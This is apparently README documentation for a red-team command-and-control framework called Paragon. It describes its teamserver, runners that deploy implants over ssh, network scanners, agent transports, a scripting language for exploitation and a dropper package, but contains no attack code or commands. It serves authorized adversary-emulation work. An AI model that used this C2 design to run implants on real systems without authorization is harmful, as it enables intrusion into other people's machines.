Acts as a middleman between the Agent and the Teamserver. It handles agent callbacks for a variety of communication mechanisms, and provides agents with new tasks from the teamserver queue.


Runner
  • Low latency, real time task execution
  • Easily extended to add support for more communication mechanisms
  • Distributed service, utilize as many runners as you'd like

Instead of waiting for a callback, some situations might require a forward connection to quickly execute a task and view its output. The runner accomplishes this by subscribing to task queues and establishing a connection to the target machine (i.e. using ssh). This enables shell-like integrations to utilize the same interface as implants and C2s. It also allows for initial implant deployment to be conducted through this interface.


Scanner
  • Monitor reachable target services
  • Automate responses when services become (un)available
  • Provide network information to the knowledge graph, which may be utilized by other tools
  • Distributed service, utilize as many scanners as you'd like

Monitor target network activity and visible services. Map out a graph of the engagement network, and trigger automation on state changes (i.e. ssh becomes available).


FAQ

What if machines report the same UUID?

Setting the PG_KS_MachineUUID killswitch environment variable for the teamserver will disable lookups that utilize machine UUIDs.


Terminology

To ensure clear communication about these complex systems, we have outlined a few project-specific terms below that will be used throughout the project's documentation.


Implant

Any malicious software that will be run on compromised systems during the engagement.


Task

Desired operations to be executed on a specific compromised system. Tasks provide execution instructions to implants, however their syntax / structure can be completely specific to a tool.


Agent

An Implant that receives tasks from the teamserver, executes them, and reports their results. An extensible default implementation is included with this repository, which requires that tasks be provided as scripts written using the project's Python-like DSL.


Job

Requests that the Teamserver perform a set of given operations. Upon creating a job, the instructions will be saved but not executed. The user may request that the Teamserver execute a job zero or more times by queuing the job and providing the required parameters to it. Jobs may never be updated, but new versions of jobs can be created to avoid excessive copy-paste.

A common use-case for a Job is when the user wishes to execute a script on a few Targets. The user creates a job, which instructs the teamserver to create tasks with the provided content, but leaves the desired target machines as a parameter. When the job is queued, the user provides a list of target machines as a parameter, and the Teamserver will create a task for each machine.


Developer Guide

Below serves as an initial and brief reference for Paragon development. More documentation can be found in the package godocs or by reading through some code :) After we have finalized some design decisions (well before reaching v1), a code-freeze will take effect until all documentation has been updated and appropriately organized.


Prerequisites
  • Git
  • Docker
  • VSCode
    • While you may use other editors, you'll lose out on the customization that speeds up development for VSCode
    • The Remote - Containers extension provided by Microsoft is required to get started.

Environment Setup

After installing the prerequisites listed above, you'll be able to get started in no time. Simply clone the repository and open it in VSCode. You will be prompted to open the codebase in a development container, which has been configured with all the project dependencies and developer tools you'll need. If this option does not appear for you, open the command palette and run > Remote-Containers: Open Folder In Container, which should start the container for you. If this is your first time launching the container, it may take a while to download... so get yourself some coffee ^_^


Project Layout

Below is an overview of the project structure and where each component lives. If this becomes outdated, please feel free to submit an issue reporting it, or preferably a PR to fix it. The codebase is set up as a monorepository, which enables us to take advantage of shared development tooling, standardization, etc. while avoiding complicated version conflicts.

Folder                Use Case
.devcontainer         Configuration for the VSCode container development environment.
.github               Github configuration.
.stats                A git ignored directory (which you may or may not have) for storing performance profiling output.
ent                   Graph related API definitions used by the teamserver.
graphql               GraphQL schema & related code generated from ent.
cmd                   Command line executable tools and services.
dist                  A git ignored directory for storing build artifacts.
docker                Dockerfiles used for example deployment.
ent                   Graph models and schemas used by the teamserver (see Facebook's entgo tool for more info).
pkg                   Public facing libraries utilized by repository tools but also exposed to the world.
pkg/agent             An abstraction to easily create an implant or communication transport.
pkg/c2                C2 service related helpers and standardized message definitions.
pkg/c2/proto          Protobuf spec to define a standardized serialization format for Agent <-> C2 communication.
pkg/drop              Provides a simple method used by compiled dropper payloads.
pkg/middleware        Common middleware for HTTP services.
pkg/script            Python-like scripting language for dynamic configuration, automation, and cross-platform exploitation.
pkg/script/stdlib     Standard libraries that expose functionality for scripting execution environments.
pkg/teamserver        Teamserver service related helpers.
www                   Contains the primary web application hosted by the teamserver. Created with Facebook's create-react-app.
www/src/components    Reusable react-components.
www/src/config        Web App configuration & routing.
www/src/views         Containers that query data from the Teamserver and compose components to render.

Teamserver Reference

Knowledge Graph

Below is an overview of the relationship between nodes in the Red Team knowledge graph managed by the Teamserver.



Agent Reference

Adding a Transport

The agent is designed to be easily customized with new transport mechanisms, multiplexing communications based on transport priority. To use your own, simply implement the agent.Sender interface and register your transport during initialization. Examples of existing transports can be found in subdirectories of the agent package.


Task Execution

By default, the agent expects tasks to adhere to starlark syntax, and exposes a standard library for scripts to utilize. To change the behaviour of task execution (i.e. just bash commands), you may implement the agent.Receiver interface to execute tasks as you'd like.


Scripting Environment

The scripting environment can be customized for your agent, enabling you to easily package new functionality for scripts to utilize. See script options to learn how to extend the agent's script engine.


Execution Flow

Below is a flow diagram of the general execution of the agent implant.





